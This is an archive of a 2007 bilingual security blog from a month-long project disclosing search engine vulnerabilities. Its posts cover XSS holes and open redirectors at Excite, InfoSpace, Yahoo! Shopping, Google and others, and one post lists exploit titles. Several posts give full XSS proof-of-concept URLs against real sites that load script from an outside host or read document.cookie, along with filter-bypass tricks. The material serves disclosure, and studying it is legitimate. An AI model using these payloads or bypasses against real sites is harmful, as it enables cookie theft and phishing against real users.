Архів за Червень, 2007

Місяць багів в Пошукових Системах: день тридцятий

23:51 30.06.2007

Продовжується Місяць багів в Пошукових Системах і сьогодні я опублікував нові уразливості.

На тридцятий день Місяця багів в Пошукових Системах я опублікував 23 редиректори. Цього разу інформація про дірки в різних пошукових системах.

В двох добірках було опубліковано 23 редиректори в різних пошукових системах.

Завтра я відведу підсумки проекту Month of Search Engines Bugs. А також підрахую голоси за баги та визначу найкращий баг MOSEB. Тому якщо ви ще не проголосували за баги (в коментарях), то ви можете зробити це зараз, а завтра дізнаєтеся про результати.

MOSEB-30 Bonus: Redirectors #2

22:45 30.06.2007

New bonus vulnerabilities in MOSEB. Today is the day of redirectors, as I wrote in MOSEB-30: Redirectors #1, and I continue to show you redirectors holes in search engines.

The list of redirectors in search engines (part 2).

MSN:

Meta:

Aport:

AOL Search:

Netscape Search:

MetaCrawler:

InfoSpace:

About Google’s redirectors.

I wrote about three Google’s redirectors in MOSEB-30 and I told, that first one already fixed.

This redirector hole worked some time ago, but after security community attracted attention of Google to the issue, they made protection for this hole (using redirect notice page). But Google fixed it poorly, so it is possible to bypass this protection.

You just need to make working link (with necessary hash) and redirector will work :-) . But this hash is temporal, so you need to update it periodically to fresh one.

Or you can use another redirector from Google (it is another version of first redirector and with constant hash):

Moral: clicking on redirecting links can be dangerous.

P.S.

Tomorrow I will total the project’s results. And also I’ll count up votes for all the bugs and find out the best bug of MOSEB. So if you didn’t vote for the bugs yet (in comments) you can do it now, and tomorrow you will see the results.

MOSEB-30: Redirectors #1

19:32 30.06.2007

Like I wrote in project description I planned a surprise for you on 30th day of Month of Search Engines Bugs. And today is the day of redirectors.

About redirectors I wrote in my article Redirectors in May (and I listed some redirectors in article). So for detailed information read this article (if you familiar with Ukrainian, and you should to be familiar, if you don’t want to miss all interesting) and now I tell you some words about this issue.

In a short - redirectors are bad. Because it can be used by bad guys for malicious purposes (like phishing). And so redirectors must be fixed - to not allow blind redirecting. This is serious problem which didn’t take attention from search engine vendors and web developers yet (just Google fixed one from many of its redirectors and fixed it poorly). So I am trying to attract attention of engines vendors and Internet community to this issue - I already wrote some times at my site about them and I decided to dedicate one day of MOSEB to the redirectors.

The list of redirectors in search engines (part 1).

Google:

Yahoo:

Ask.com:

Yandex:

Rambler:

Excite:

Webcrawler:

Moral: redirectors can be dangerous.

P.S.

In bonus post I’ll wrote about redirectors holes in others search engines and show you how to bypass Google’s protection for their first redirector. So wait for today’s bonus post ;-) .

Добірка експлоітів

16:15 30.06.2007

В даній добірці експлоіти в веб додатках:

  • PHPMyRing <= 4.1.3b (path) Remote File Include Vulnerability (деталі)
  • Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit (деталі)
  • JV2 Folder Gallery <= 3.0 Remote File Include Vulnerability (деталі)
  • Cerulean Portal System 0.7b Remote File Include Vulnerability (деталі)
  • Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln (деталі)
  • phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities (деталі)
  • SIPS <= 0.3.1 (box.inc.php) Remote File Include Vulnerability (деталі)
  • Exploits WarFTPd 1.65 Username Stack-Based Buffer-Overflow Vulnerability (деталі)
  • Guppy <= 4.5.16 remote commands execution exploit (деталі)
  • EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit (деталі)

Місяць багів в Пошукових Системах: день двадцять дев’ятий

23:47 29.06.2007

Продовжується Місяць багів в Пошукових Системах і сьогодні я опублікував нові уразливості.

На двадцять дев’ятий день Місяця багів в Пошукових Системах я опублікував чотири Cross-Site Scripting уразливості. Цього разу інформація про дірки в пошуковій системі Excite.

  • MOSEB-29: Vulnerabilitiy at money.excite.com (деталі)
  • MOSEB-29 Bonus: Vulnerabilities in Excite White Pages (деталі)

1 XSS уразливість в Excite Money & Investing та 3 XSS уразливості в пошуці Excite по Білим Сторінкам.

Очікуємо на наступний день Month of Search Engines Bugs.

MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case vulnerabilities at other domain, than in MOSEB-29: Vulnerabilitiy at money.excite.com.

The vulnerability is at Excite White Pages (kevdb.infospace.com) which located on server of InfoSpace (Excite’s partner). These Cross-Site Scripting holes I found 31.05.2007.

XSS:

The vulnerabilities are in qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US

Moral: seeking in white pages can be dangerous.

Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for these vulnerabilities.

Also note, that Excite White Pages engine use InfoSpace engine. So InfoSpace also responsible for these vulnerabilities.

MOSEB-29: Vulnerability at money.excite.com

19:48 29.06.2007

Next participant of the project is Excite search engine. It is one of the popular meta search engines (in USA).

The vulnerability is at Excite Money & Investing (money.excite.com) in symbol search results. This Cross-Site Scripting hole I found 31.05.2007. And I used null byte filters bypass technique for Mozilla and slash filters bypass technique for Internet Explorer.

XSS:

The vulnerability is in symbol_search_text parameter:
http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%3Cscript%00src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E

Also page with html injection hole has PR7. It is a dream and black seo guys will be happy :-) .

Moral: searching for money can be dangerous.

Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for this vulnerability.

P.S.

Also I prepared others holes concerned with Excite. So wait for today’s bonus post ;-) .

Добірка уразливостей

16:24 29.06.2007

В даній добірці уразливості в веб додатках:

Місяць багів в Пошукових Системах: день двадцять восьмий

23:14 28.06.2007

Продовжується Місяць багів в Пошукових Системах і сьогодні я опублікував нові уразливості.

На двадцять восьмий день Місяця багів в Пошукових Системах я опублікував три Cross-Site Scripting уразливості. Цього разу інформація про дірки в пошукових системах Kelkoo та Yahoo.

2 XSS уразливості в пошуковці Kelkoo (на двох його доменах) та 1 XSS уразливість в пошуковці Yahoo! Shopping.

Очікуємо на наступний день Month of Search Engines Bugs.

MOSEB-28 Bonus: Vulnerability at shopping.yahoo.com

22:42 28.06.2007

New bonus vulnerability in MOSEB. This time vulnerability at Yahoo! Shopping. As I wrote in MOSEB-28, Kelkoo belongs to Yahoo (and used as a part of Yahoo! Shopping) so I decided to write about hole at shopping.yahoo.com (which is relative to Kelkoo engine that described in MOSEB-28: Vulnerabilities in Kelkoo). This is new vulnerability in Yahoo, after MOSEB-02.

The vulnerability is at Yahoo! Shopping (shopping.yahoo.com) in Abuse Report. This Cross-Site Scripting hole I found 24.06.2007 and it works in Internet Explorer. It is very cute hole: to bypass filters I used variable-width encoding with expression technique.

XSS:

The vulnerability is in review_excerpt with review_title parameters:
http://shopping.yahoo.com/merchrating/abuse_report.html;_ylu=?message_id=scd-337&merchant_id=1002688&review_excerpt=style%3Dxss:expression(alert(document.cookie))%20%C0&review_title=%C0

Moral: writing reports to search engine vendors can be dangerous.